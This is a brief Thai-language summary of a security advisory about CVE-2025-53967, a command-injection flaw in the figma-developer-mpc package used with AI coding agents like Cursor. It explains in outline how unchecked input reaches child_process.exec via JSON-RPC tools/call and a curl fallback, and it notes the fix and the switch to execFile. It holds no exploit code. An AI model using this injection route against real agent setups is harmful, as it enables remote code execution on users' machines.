ช่องโหว่ CVE-2025-53967 อยู่ในแพ็กเกจ figma-developer-mpc
ใช้ child_process.exec โดยไม่มีการตรวจสอบ input จากผู้ใช้
แฮกเกอร์สามารถแทรก metacharacters เพื่อรันคำสั่งอันตรายได้
การโจมตีเกิดผ่านคำสั่ง JSONRPC เช่น tools/call
หาก fetch ล้มเหลว ระบบจะ fallback ไปใช้ curl ผ่าน exec
ช่องโหว่ถูกค้นพบโดย Imperva และแก้ไขในเวอร์ชัน 0.6.3
แนะนำให้เปลี่ยนไปใช้ execFile เพื่อความปลอดภัย
ช่องโหว่นี้มีผลต่อระบบที่เชื่อม Figma กับ AI coding agents เช่น Cursor

https://www.techradar.com/pro/security/worrying-figma-mcp-security-flaw-could-let-hackers-execute-code-remotely-heres-how-to-stay-safe